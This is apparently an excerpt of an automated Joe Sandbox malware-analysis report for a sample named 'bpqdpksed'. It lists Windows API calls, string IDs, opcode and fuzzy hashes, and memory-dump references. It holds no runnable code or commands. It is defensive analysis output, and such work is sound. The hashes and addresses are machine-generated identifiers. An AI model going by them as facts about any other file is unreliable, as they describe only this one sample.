                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 5892c0575da12f0b79b066996cdab2c811222ba013ee2221f30df82999b583dc
                                                                                              • Instruction ID: ac3bd692290c88698ca4f43a7780db61425f9e8f7a4c09115d3d7ed7bc408b6f
                                                                                              • Opcode Fuzzy Hash: 5892c0575da12f0b79b066996cdab2c811222ba013ee2221f30df82999b583dc
                                                                                              • Instruction Fuzzy Hash: 85E075B5900209EFCB51AFA09808A6DBBB6EB48311F15C44AE94AE3351DB389941EF64
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00DBEBEA
                                                                                              • GetDC.USER32(00000000), ref: 00DBEBF4
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBEC00
                                                                                              • ReleaseDC.USER32(?), ref: 00DBEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 95c44cf1303383c5443ec100b0b7468821331a36dec4987fc45b0ae4966496fe
                                                                                              • Instruction ID: ffb805730e420c42c4521cab588d10fc9edbf6294138ba416d5d5df1b8f806ae
                                                                                              • Opcode Fuzzy Hash: 95c44cf1303383c5443ec100b0b7468821331a36dec4987fc45b0ae4966496fe
                                                                                              • Instruction Fuzzy Hash: 34E075B5900209EFCB519FA09808A6DBBB6AB48315B15C449E949E3350DB389941DF60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: ae100e6a79c19e93a2698b8a58107149fafcfe6343f79538e554a3aeb1ec7316
                                                                                              • Instruction ID: 4bfcfb1b9051762b83c744a0983022c7407e28ea197507841b2a2ea474e100f5
                                                                                              • Opcode Fuzzy Hash: ae100e6a79c19e93a2698b8a58107149fafcfe6343f79538e554a3aeb1ec7316
                                                                                              • Instruction Fuzzy Hash: 91513031504246DFCF15DF28C480AFE7BAAEF55310F688059E9969B290EB30DD92DB71
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                              • String ID: CALLARGARRAY
                                                                                              • API String ID: 157775604-1150593374
                                                                                              • Opcode ID: d6a563fd970068c4476388412da33d3a669d048e4875e1aff0e38d2b3ab0ccb9
                                                                                              • Instruction ID: ebefddd9b4ed4e43853ae119bdfafc26c77489ab2a50677a836bd3e76baa8c69
                                                                                              • Opcode Fuzzy Hash: d6a563fd970068c4476388412da33d3a669d048e4875e1aff0e38d2b3ab0ccb9
                                                                                              • Instruction Fuzzy Hash: CF419071A002199FCB05EFAAC8859BEBBB5EF69360F144129E506A7352E770DD81CB70
                                                                                              APIs
                                                                                                • Part of subcall function 00D6771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D67759
                                                                                                • Part of subcall function 00D6771B: GetStockObject.GDI32(00000011), ref: 00D6776D
                                                                                                • Part of subcall function 00D6771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D67777
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DF40D9
                                                                                              • GetSysColor.USER32(00000012), ref: 00DF40F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 18313ac93b9c7ffa03dd0fdac8787338af04ebcc59985f2ffd9f70725d6e6e19
                                                                                              • Instruction ID: 99bd1ab15facd006267c8130666393b059ad94d9b162fdb51f1746cbbf83d404
                                                                                              • Opcode Fuzzy Hash: 18313ac93b9c7ffa03dd0fdac8787338af04ebcc59985f2ffd9f70725d6e6e19
                                                                                              • Instruction Fuzzy Hash: F811077261020DAFDB01DFA8CC46AFA7BB9FB08314F058929FA55E3250E775E851DB60
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DC25DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 33cfa89c521252d7314a4c6c5eddf432ba197833230165fd828fdccd385bd0e9
                                                                                              • Instruction ID: b54eac5d5fa4d2f571feb60007bec677fe9856d4236017fc52cf52867bc17deb
                                                                                              • Opcode Fuzzy Hash: 33cfa89c521252d7314a4c6c5eddf432ba197833230165fd828fdccd385bd0e9
                                                                                              • Instruction Fuzzy Hash: D301D871610226ABCB14EB64CC61EFF7765EF56320B08061EB863973D6EE3098089670
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DC24D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: e0f600dbc2ec86f4c1e8c2bfbd94b6705988ada8e585c1e409d8fd085895ffb5
                                                                                              • Instruction ID: 2580a72e400217a4144d0cded95dcb37be48ccdb5b107e9d101823de5f9e9102
                                                                                              • Opcode Fuzzy Hash: e0f600dbc2ec86f4c1e8c2bfbd94b6705988ada8e585c1e409d8fd085895ffb5
                                                                                              • Instruction Fuzzy Hash: D901A77164410AABDF28EBA0C861FFFB7A9DF65350F14001EA542A72C2DA609E08C671
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DC2558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: bdc14c7d7956de6697325e683b5960d26d87fed38da1530bec45f11b3abadfa9
                                                                                              • Instruction ID: 7bc305299323563f9dcbd0e04e34eded8180eca14596aac8f20a2d379813af81
                                                                                              • Opcode Fuzzy Hash: bdc14c7d7956de6697325e683b5960d26d87fed38da1530bec45f11b3abadfa9
                                                                                              • Instruction Fuzzy Hash: AC01A27165010AA7CB15EBA4C922FFF77A8DB15750F18001A7942B72C2EA60DF088671
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DC2663
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 1111303e7c65e7f4cc7288aac0ff1d71dbdacf77bb67e376d8b68018ae114ffd
                                                                                              • Instruction ID: 21c73b6ff8b63025437f1cf455926b93943b3bf085da3af64e8b8c02957fd15d
                                                                                              • Opcode Fuzzy Hash: 1111303e7c65e7f4cc7288aac0ff1d71dbdacf77bb67e376d8b68018ae114ffd
                                                                                              • Instruction Fuzzy Hash: 5CF0A471A8021AA7CB14F7A49C62FFF7778EF15720F040A1AB562A72C2DB7099088674
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E34018,00E3405C), ref: 00DF8B1E
                                                                                              • CloseHandle.KERNEL32 ref: 00DF8B30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: \@
                                                                                              • API String ID: 3712363035-3571869489
                                                                                              • Opcode ID: 6d26fd6a90318d0eef2a6caa96326962ce28dfece37da4f97eb00906db61a0c5
                                                                                              • Instruction ID: 38e48a24106975bb2fa5f30573e15f6837e084a679b4d4f7c58940d778d4fb10
                                                                                              • Opcode Fuzzy Hash: 6d26fd6a90318d0eef2a6caa96326962ce28dfece37da4f97eb00906db61a0c5
                                                                                              • Instruction Fuzzy Hash: 1BF054F2640308BFF2202B616C4AF773E9DDB05750F014020BB08E61D1D6755C449BBA
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF2C8B
                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DF2C9E
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: d89f91c1187bca4930dd1f556ca1c1fbac8455f2174313f71d5e47d24a518db0
                                                                                              • Instruction ID: 363219ceb7368dd8a8b762ef0099e18ae23154d43e4ecac68a0cdeb2f9590fe9
                                                                                              • Opcode Fuzzy Hash: d89f91c1187bca4930dd1f556ca1c1fbac8455f2174313f71d5e47d24a518db0
                                                                                              • Instruction Fuzzy Hash: 4BD012363C4350BBF668B770EC0FFE67A57AB50B15F1048267749EA2D0C9E06800C674
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF2CCB
                                                                                              • PostMessageW.USER32(00000000), ref: 00DF2CD2
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 529655941-2988720461
                                                                                              • Opcode ID: 279d14c9ea1b3cba623c765b9f2e14e03010cfd24a906cdce8b7fe148fe19283
                                                                                              • Instruction ID: e6527456674ec0ef6a9504999a4c6c0d57a1fb8deb795ae78c8e4123e601e523
                                                                                              • Opcode Fuzzy Hash: 279d14c9ea1b3cba623c765b9f2e14e03010cfd24a906cdce8b7fe148fe19283
                                                                                              • Instruction Fuzzy Hash: E4D012363C53507BF668B770EC0FFD67A57AB55B15F5048267745EA2D0C9E06800C678
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D9C233
                                                                                              • GetLastError.KERNEL32 ref: 00D9C241
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D9C29C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1717984340-0
                                                                                              • Opcode ID: 464307ece72279614912157eef11d20fa70a06da0f616bca51f116d4f1af2727
                                                                                              • Instruction ID: f59186347e49c89a0088ace84f74b2859080025a2fb1e1ca5e8b54d76553c5c6
                                                                                              • Opcode Fuzzy Hash: 464307ece72279614912157eef11d20fa70a06da0f616bca51f116d4f1af2727
                                                                                              • Instruction Fuzzy Hash: E941E731610306EFDF219FE4C844BBA7BA5EF45720F289169F859AB1A1EB308D01C774